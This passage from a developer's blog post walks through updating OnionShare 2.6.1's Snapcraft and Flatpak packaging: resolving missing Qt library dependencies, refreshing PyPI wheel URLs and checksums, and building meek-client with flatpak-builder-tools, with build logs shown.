- library: libevent_openssl-2.1.so.7: unused library 'usr/local/lib/libevent_openssl-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
- library: libevent_pthreads-2.1.so.7: unused library 'usr/local/lib/libevent_pthreads-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
Created snap package onionshare_2.6.1_amd64.snap
</code></pre>
<p>I installed this snap and tried running it, and this time it crashed with the error:</p>
<pre><code>Failed to create wl_display (No such file or directory)
qt.qpa.plugin: Could not load the Qt platform plugin "wayland" in "" even though it was found.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, vkkhrdisplay, vnc, wayland-egl, wayland, xcb.
Aborted (core dumped)
</code></pre>
<p>It looks like I need to install some more dependencies for this to work. The lint warnings give some useful hints as to what they might be. Look at this line:</p>
<pre><code>- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineCore.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
</code></pre>
<p>Qt6 is missing the dependency <code>libxkbfile.so.1</code>. On Ubuntu, you can search for which package contains that file like this:</p>
<pre><code>$ apt-file search libxkbfile.so.1
libxkbfile1: /usr/lib/x86_64-linux-gnu/libxkbfile.so.1
libxkbfile1: /usr/lib/x86_64-linux-gnu/libxkbfile.so.1.0.2
</code></pre>
<p>This means that if I install the package <code>libxkbfile1</code>, it should come with the library I need. Doing the same for all of the lint warnings about missing dependencies, I found that I needed to add the following packages to <code>stage-packages</code>:</p>
<ul>
<li><code>libgstreamer1.0-0</code></li>
<li><code>libgstreamer1.0-dev</code></li>
<li><code>libgstreamer-gl1.0-0</code></li>
<li><code>libgstreamer-plugins-base1.0-0</code></li>
<li><code>libmysqlclient21</code></li>
<li><code>libxcb-cursor0</code></li>
<li><code>libxkbfile1</code></li>
<li><code>qml6-module-qtquick3d-spatialaudio</code></li>
</ul>
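<p>Rather than eyeballing each warning, the missing library names can be pulled out of the lint output mechanically and then fed to <code>apt-file search</code> one at a time. Here's a small sketch (with sample lint lines inlined so it runs as-is; note that <code>apt-file</code> isn't installed by default and needs <code>sudo apt install apt-file &amp;&amp; sudo apt-file update</code> first):</p>

```shell
# Extract the unique missing-library names from snapcraft's lint output.
# A few sample lint lines are inlined here so the pipeline runs as-is;
# in practice, save the real snapcraft output to lint.txt instead.
cat > /tmp/lint.txt <<'EOF'
- library: libQt6WebEngineCore.so.6: missing dependency 'libxkbfile.so.1'.
- library: libqxcb.so: missing dependency 'libxcb-cursor.so.0'.
- library: QtWebEngineProcess: missing dependency 'libxkbfile.so.1'.
EOF
grep -o "missing dependency '[^']*'" /tmp/lint.txt \
    | sed "s/.*'\(.*\)'/\1/" \
    | sort -u
# Each name can then be resolved to a package with: apt-file search <name>
```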
<p>I tried to build another snap:</p>
<pre><code>$ snapcraft
Launching instance...
Executed: skip pull launcher (already ran)
Executed: skip pull libevent (already ran)
Executed: skip pull meek-client (already ran)
Executed: skip pull obfs4 (already ran)
Executed: skip pull snowflake-client (already ran)
Executed: skip pull tor (already ran)
Executed: skip pull onionshare-cli (already ran)
Stage package not found in part 'onionshare': qml6-module-qtquick3d-spatialaudio.
Failed to execute pack in instance.
Full execution log: '/home/user/.local/state/snapcraft/log/snapcraft-20230905-172355.921802.log'
</code></pre>
<p>After some investigation, I found that <code>qml6-module-qtquick3d-spatialaudio</code> is in the Ubuntu <code>universe</code> repository, not the <code>main</code> one. I don't think OnionShare actually uses it, though, so I decided to just remove it and try again. This time there were fewer lint warnings about missing dependencies:</p>
<pre><code>Lint warnings:
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/Helpers/impl/libqtquick3dhelpersimplplugin.so: missing dependency 'libQt6Quick3DHelpersImpl.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/SpatialAudio/libquick3dspatialaudioplugin.so: missing dependency 'libQt6Quick3DSpatialAudio.so.6'. (https://snapcraft.io/docs/linters-library)
</code></pre>
<p>Now let's try running it:</p>
<pre><code>$ /snap/bin/onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
Failed to create wl_display (No such file or directory)
qt.qpa.plugin: Could not load the Qt platform plugin "wayland" in "" even though it was found.
Gtk-Message: 19:24:23.370: Failed to load module "canberra-gtk-module"
Gtk-Message: 19:24:23.370: Failed to load module "canberra-gtk-module"
</code></pre>
<p>And it worked!</p>
<p><img src="onionshare-snapcraft.png" alt="OnionShare running in Snapcraft"></p>
<p>I successfully connected to Tor, quickly tested it, and everything appears to work.</p>
<p>But there's one more thing I want to do. In the previous version of the snap package, I had an extra <code>launcher</code> component that set some environment variables before running <code>onionshare</code> or <code>onionshare-cli</code>, but I don't think that's necessary anymore. Instead, I can simplify things by adding the <code>$SNAP/usr/local</code> paths to <code>PATH</code> and <code>LD_LIBRARY_PATH</code> directly. So I deleted the whole <code>launcher</code> part and updated the two apps to set the environment variables themselves instead of going through the launcher:</p>
<div class="hll"><pre><span></span><span class="nt">apps</span><span class="p">:</span>
<span class="w"> </span><span class="nt">onionshare</span><span class="p">:</span>
<span class="w"> </span><span class="nt">common-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.onionshare.OnionShare</span>
<span class="w"> </span><span class="nt">command</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bin/onionshare</span>
<span class="w"> </span><span class="nt">plugs</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">desktop</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">home</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network-bind</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">removable-media</span>
<span class="w"> </span><span class="nt">environment</span><span class="p">:</span>
<span class="w"> </span><span class="nt">LANG</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C.UTF-8</span>
<span class="w"> </span><span class="nt">PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$SNAP/bin:$SNAP/usr/bin:$SNAP/usr/local/bin:$PATH</span>
<span class="w"> </span><span class="nt">LD_LIBRARY_PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$LD_LIBRARY_PATH:$SNAP/usr/local/lib</span>
<span class="w"> </span><span class="nt">cli</span><span class="p">:</span>
<span class="w"> </span><span class="nt">common-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.onionshare.OnionShareCli</span>
<span class="w"> </span><span class="nt">command</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bin/onionshare-cli</span>
<span class="w"> </span><span class="nt">plugs</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">home</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network-bind</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">removable-media</span>
<span class="w"> </span><span class="nt">environment</span><span class="p">:</span>
<span class="w"> </span><span class="nt">LANG</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C.UTF-8</span>
<span class="w"> </span><span class="nt">PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$SNAP/bin:$SNAP/usr/bin:$SNAP/usr/local/bin:$PATH</span>
<span class="w"> </span><span class="nt">LD_LIBRARY_PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$LD_LIBRARY_PATH:$SNAP/usr/local/lib</span>
</pre></div>
<p>I built another snap, installed it, and tested it one more time, and it worked! Time to commit my code.</p>
<h2 id="making-sure-the-flatpak-packaging-works">Making sure the Flatpak packaging works</h2><p>With Snapcraft done, let's take a look at Flatpak. The <a href="https://github.com/onionshare/onionshare/blob/main/flatpak/org.onionshare.OnionShare.yaml">Flatpak manifest file</a> is in <code>flatpak/org.onionshare.OnionShare.yaml</code>. To update the Flatpak package I basically need to upgrade all of the dependencies listed in the manifest, including the URLs to download them from and their sha256 checksums.</p>
<p>But first, I'm going to make sure I have <code>flatpak</code> and <code>flatpak-builder</code> installed, and make sure the Flathub repository is added:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>apt<span class="w"> </span>install<span class="w"> </span>flatpak<span class="w"> </span>flatpak-builder
flatpak<span class="w"> </span>remote-add<span class="w"> </span>--if-not-exists<span class="w"> </span>flathub<span class="w"> </span>https://dl.flathub.org/repo/flathub.flatpakrepo
</pre></div>
<h3 id="updating-pyside6">Updating <code>pyside6</code></h3><p>I'll start with the <code>pyside6</code> module, since it's at the top (luckily, I had already upgraded the Flatpak packaging from PySide2 to PySide6). Here's the code for the PySide6 module:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pyside6</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">[]</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pyside6-essentials</span>
<span class="w"> </span><span class="nt">only-arches</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">x86_64</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --verbose --exists-action=i --no-index --find-links="file://${PWD}"</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--prefix=${FLATPAK_DEST} "pyside6-essentials" --no-build-isolation</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/e5/96/f43cdcb397f8a8cff6991ef8109385cc5ad9b0ad78c6dc2988b3b776fe49/PySide6_Essentials-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">8c3d37cca6e27f6da12b50b20e741d593ccc857bdcdb82d97f8f7c8bfe53639a</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">shiboken6</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --verbose --exists-action=i --no-index --find-links="file://${PWD}"</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--prefix=${FLATPAK_DEST} "shiboken6" --no-build-isolation</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/24/f6/f1fe9220a616789a1c6b1b73670d8b1dec882ac730a8b534f963b3f26182/shiboken6-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">0616c1a12d1e51e680595b3940b986275c1df952a751416a0730a59e5b90105f</span>
</pre></div>
<p>This essentially installs two Python modules, <a href="https://pypi.org/project/PySide6-Essentials/">PySide6-Essentials</a> and <a href="https://pypi.org/project/shiboken6/">shiboken6</a>, from PyPI--these are binary packages pre-compiled for the x86_64 architecture. Flatpak downloads the <code>whl</code> files from the URLs provided, verifies the sha256 checksums, and runs the build commands to install them. Since <code>pyside6-essentials</code> depends on <code>shiboken6</code>, <code>shiboken6</code> is listed under the <code>modules</code> key of <code>pyside6-essentials</code>.</p>
<p>To update this, I just need to check PyPI for the latest versions of both of these packages and update the URL and sha256 checksums. The latest version of <code>pyside6-essentials</code> is 6.5.2, and the latest version of <code>shiboken6</code> is also 6.5.2. You can find links to the package files, along with their checksums, on the PyPI pages for those packages under "Download files".</p>
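<p>When updating these by hand, it's easy to paste a checksum that doesn't match the file you think it does, so it's worth verifying the downloaded wheel locally before committing. A sketch of the pattern (the throwaway file below stands in for the real wheel so it runs anywhere; substitute the actual <code>.whl</code> filename and the sha256 from the "Download files" page):</p>

```shell
# sha256sum -c reads "<hash>  <filename>" lines and verifies each file.
# A throwaway file stands in for the wheel here; for the real check, use
# the downloaded .whl and the checksum listed on PyPI.
printf 'demo wheel contents' > /tmp/demo.whl
hash=$(sha256sum /tmp/demo.whl | cut -d' ' -f1)
echo "$hash  /tmp/demo.whl" | sha256sum -c -
# prints: /tmp/demo.whl: OK
```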
<p>So I updated those. Just to make it clear, here's the diff:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/flatpak/org.onionshare.OnionShare.yaml b/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gh">index b455cb71..9d0f0cb5 100644</span>
<span class="gd">--- a/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gi">+++ b/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gu">@@ -35,8 +35,8 @@ modules:</span>
<span class="w"> </span> --prefix=${FLATPAK_DEST} "pyside6-essentials" --no-build-isolation
<span class="w"> </span> sources:
<span class="w"> </span> - type: file
<span class="gd">- url: https://files.pythonhosted.org/packages/e5/96/f43cdcb397f8a8cff6991ef8109385cc5ad9b0ad78c6dc2988b3b776fe49/PySide6_Essentials-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gd">- sha256: 8c3d37cca6e27f6da12b50b20e741d593ccc857bdcdb82d97f8f7c8bfe53639a</span>
<span class="gi">+ url: https://files.pythonhosted.org/packages/d0/de/9a089e91c2e0fe4f122218bba4f9dbde46338659f412739bd9db1ed9df4f/PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gi">+ sha256: 1620e82b38714a1570b142c01694d0415a25526517b24620ff9b00c9f76cfca9</span>
<span class="w"> </span> modules:
<span class="w"> </span> - name: shiboken6
<span class="w"> </span> buildsystem: simple
<span class="gu">@@ -45,8 +45,8 @@ modules:</span>
<span class="w"> </span> --prefix=${FLATPAK_DEST} "shiboken6" --no-build-isolation
<span class="w"> </span> sources:
<span class="w"> </span> - type: file
<span class="gd">- url: https://files.pythonhosted.org/packages/24/f6/f1fe9220a616789a1c6b1b73670d8b1dec882ac730a8b534f963b3f26182/shiboken6-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gd">- sha256: 0616c1a12d1e51e680595b3940b986275c1df952a751416a0730a59e5b90105f</span>
<span class="gi">+ url: https://files.pythonhosted.org/packages/55/44/d8c366dd4f069166ab9890acb44d004c5e6122714e44c169273dcbbca897/shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gi">+ sha256: 3fbc35ff3c19e7d39433671bfc1be3d7fa9d071bfdd0ffe1c2a4d27acd6cf6a5</span>
<span class="w"> </span> - name: tor
<span class="w"> </span> buildsystem: autotools
<span class="w"> </span> sources:
</pre></div>
<h3 id="updating-tor">Updating <code>tor</code></h3><p>The process to upgrade the version of tor installed by the <code>tor</code> module is similar, but this time the <code>buildsystem</code> is set to <code>autotools</code>, which means it will basically run <code>./configure</code>, <code>make</code>, and <code>make install</code> to compile it from source. The <code>tor</code> module has its own <code>modules</code> section, which lists <code>libevent</code>, a dependency of tor.</p>
<p>To update it, I just need to update the source package URLs and sha256 checksums for both tor and libevent. I already did this for the Snapcraft package, so I'm just copying the URLs and checksums over from <code>snapcraft.yaml</code>.</p>
<h3 id="trying-to-update-obfs4proxy-meek-client-and-snowflake-client">Trying to update <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code></h3><p>These three pluggable transports are all written in Go, and they all have dependencies of their own. This is where I'm going to start relying on <a href="https://github.com/flatpak/flatpak-builder-tools/">flatpak-builder-tools</a>, a collection of scripts that make this work much simpler.</p>
<p>In another folder, I clone the repo:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>clone<span class="w"> </span>https://github.com/flatpak/flatpak-builder-tools.git
<span class="nb">cd</span><span class="w"> </span>flatpak-builder-tools
</pre></div>
<p>This project includes the <a href="https://github.com/flatpak/flatpak-builder-tools/tree/master/go-get">Go Get Generator</a> in the <code>go-get</code> folder, with unfortunately rather convoluted instructions. For each of these Go dependencies, I need to:</p>
<ul>
<li>Create a new Flatpak manifest file just for the one go dependency, with network access available during the build, and run the <code>go get</code> command</li>
<li>Run <code>flatpak-builder</code> with the <code>--keep-build-dirs</code> flag, which will download all of the dependencies for the go project and keep them when it's done building</li>
<li>Run the <code>flatpak-go-get-generator.py</code> script to create a Flatpak manifest file that actually includes all of these dependencies (their git repo URLs and commit IDs)--though, it will generate the manifest in JSON format</li>
<li>Convert the manifest it generates from JSON into YAML, and copy and paste it into the OnionShare Flatpak manifest YAML file</li>
</ul>
<p>I know from my Snapcraft work that there are no new versions of <code>obfs4proxy</code>, but I do need to upgrade <code>meek-client</code> and <code>snowflake-client</code>. Let's start with <code>meek-client</code>.</p>
<p>I'm starting by making a new file called <code>meek-client.yaml</code> and copying and pasting code from the Go Get Generator readme, except changing the <code>go get</code> build command to point to <code>git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0</code>.</p>
<p>But then when I tried running the <code>flatpak-builder</code> command, I kept getting errors. It's been a long time since I last did this, and I don't quite remember how I got it working...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>After much trial and error--including learning that the <code>go get</code> syntax itself is <a href="https://go.dev/doc/go-get-install-deprecation">now deprecated</a> in favor of <code>go install</code> (I'm not much of a Go programmer)--I got <code>flatpak-builder</code> to work with this manifest file:</p>
<div class="hll"><pre><span></span><span class="nt">app-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">com.example.meek-client</span>
<span class="nt">runtime</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Platform</span>
<span class="nt">runtime-version</span><span class="p">:</span><span class="w"> </span><span class="s">'21.08'</span>
<span class="nt">sdk</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Sdk</span>
<span class="nt">sdk-extensions</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Sdk.Extension.golang</span>
<span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">meek-client</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-options</span><span class="p">:</span>
<span class="w"> </span><span class="nt">append-path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/usr/lib/sdk/golang/bin</span>
<span class="w"> </span><span class="nt">env</span><span class="p">:</span>
<span class="w"> </span><span class="nt">GOBIN</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/app/bin</span>
<span class="w"> </span><span class="nt">GO111MODULE</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">on</span>
<span class="w"> </span><span class="nt">GOPATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/run/build/meek-client</span>
<span class="w"> </span><span class="nt">build-args</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--share=network</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">go install git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0</span>
</pre></div>
<p>I built it with <code>flatpak-builder</code> by running:</p>
<div class="hll"><pre><span></span>$<span class="w"> </span>flatpak-builder<span class="w"> </span>build<span class="w"> </span>--force-clean<span class="w"> </span>--install-deps-from<span class="o">=</span>flathub<span class="w"> </span>--keep-build-dirs<span class="w"> </span>./meek-client.yaml
Dependency<span class="w"> </span>Sdk:<span class="w"> </span>org.freedesktop.Sdk<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Sdk/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Dependency<span class="w"> </span>Runtime:<span class="w"> </span>org.freedesktop.Platform<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Platform/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Dependency<span class="w"> </span>Extension:<span class="w"> </span>org.freedesktop.Sdk.Extension.golang<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Sdk.Extension.golang/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Downloading<span class="w"> </span>sources
Initializing<span class="w"> </span>build<span class="w"> </span>dir
Committing<span class="w"> </span>stage<span class="w"> </span>init<span class="w"> </span>to<span class="w"> </span>cache
Starting<span class="w"> </span>build<span class="w"> </span>of<span class="w"> </span>com.example.meek-client
<span class="o">========================================================================</span>
Building<span class="w"> </span>module<span class="w"> </span>meek-client<span class="w"> </span><span class="k">in</span><span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/build/meek-client-1
<span class="o">========================================================================</span>
Running:<span class="w"> </span>go<span class="w"> </span>install<span class="w"> </span>git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0
go:<span class="w"> </span>downloading<span class="w"> </span>git.torproject.org/pluggable-transports/meek.git<span class="w"> </span>v0.38.0
go:<span class="w"> </span>downloading<span class="w"> </span>git.torproject.org/pluggable-transports/goptlib.git<span class="w"> </span>v1.1.0
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/net<span class="w"> </span>v0.0.0-20220909164309-bea034e7d591
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/refraction-networking/utls<span class="w"> </span>v1.1.5
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/crypto<span class="w"> </span>v0.0.0-20220829220503-c86fa9a7ed90
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/klauspost/compress<span class="w"> </span>v1.15.9
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/andybalholm/brotli<span class="w"> </span>v1.0.4
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/text<span class="w"> </span>v0.3.7
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/sys<span class="w"> </span>v0.0.0-20220728004956-3c1f35247d10
debugedit:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client:<span class="w"> </span>DWARF<span class="w"> </span>version<span class="w"> </span><span class="m">0</span><span class="w"> </span>unhandled
compressing<span class="w"> </span>debuginfo<span class="w"> </span><span class="k">in</span>:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client
processing:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client
<span class="o">[</span><span class="m">25</span><span class="o">]</span><span class="w"> </span>.debug_abbrev<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_abbrev<span class="w"> </span><span class="o">(</span><span class="nv">307</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">289</span><span class="w"> </span><span class="m">94</span>.14%<span class="o">)</span>
<span class="o">[</span><span class="m">26</span><span class="o">]</span><span class="w"> </span>.debug_line<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_line<span class="w"> </span><span class="o">(</span><span class="nv">529246</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">485044</span><span class="w"> </span><span class="m">91</span>.65%<span class="o">)</span>
<span class="o">[</span><span class="m">27</span><span class="o">]</span><span class="w"> </span>.debug_frame<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_frame<span class="w"> </span><span class="o">(</span><span class="nv">104484</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">84780</span><span class="w"> </span><span class="m">81</span>.14%<span class="o">)</span>
<span class="o">[</span><span class="m">28</span><span class="o">]</span><span class="w"> </span>.debug_gdb_scripts<span class="w"> </span>NOT<span class="w"> </span>compressed,<span class="w"> </span>wouldn<span class="err">'</span>t<span class="w"> </span>be<span class="w"> </span>smaller
<span class="o">[</span><span class="m">29</span><span class="o">]</span><span class="w"> </span>.debug_info<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_info<span class="w"> </span><span class="o">(</span><span class="nv">875910</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">787285</span><span class="w"> </span><span class="m">89</span>.88%<span class="o">)</span>
<span class="o">[</span><span class="m">30</span><span class="o">]</span><span class="w"> </span>.debug_loc<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_loc<span class="w"> </span><span class="o">(</span><span class="nv">671185</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">536563</span><span class="w"> </span><span class="m">79</span>.94%<span class="o">)</span>
<span class="o">[</span><span class="m">31</span><span class="o">]</span><span class="w"> </span>.debug_ranges<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_ranges<span class="w"> </span><span class="o">(</span><span class="nv">177308</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">148978</span><span class="w"> </span><span class="m">84</span>.02%<span class="o">)</span>
<span class="o">[</span><span class="m">9</span><span class="o">]</span><span class="w"> </span>Updating<span class="w"> </span>section<span class="w"> </span>string<span class="w"> </span>table
stripping<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client<span class="w"> </span>to<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/lib/debug/bin/meek-client.debug
Committing<span class="w"> </span>stage<span class="w"> </span>build-meek-client<span class="w"> </span>to<span class="w"> </span>cache
Cleaning<span class="w"> </span>up
Committing<span class="w"> </span>stage<span class="w"> </span>cleanup<span class="w"> </span>to<span class="w"> </span>cache
Finishing<span class="w"> </span>app
Using<span class="w"> </span>meek-client<span class="w"> </span>as<span class="w"> </span><span class="nb">command</span>
Please<span class="w"> </span>review<span class="w"> </span>the<span class="w"> </span>exported<span class="w"> </span>files<span class="w"> </span>and<span class="w"> </span>the<span class="w"> </span>metadata
Committing<span class="w"> </span>stage<span class="w"> </span>finish<span class="w"> </span>to<span class="w"> </span>cache
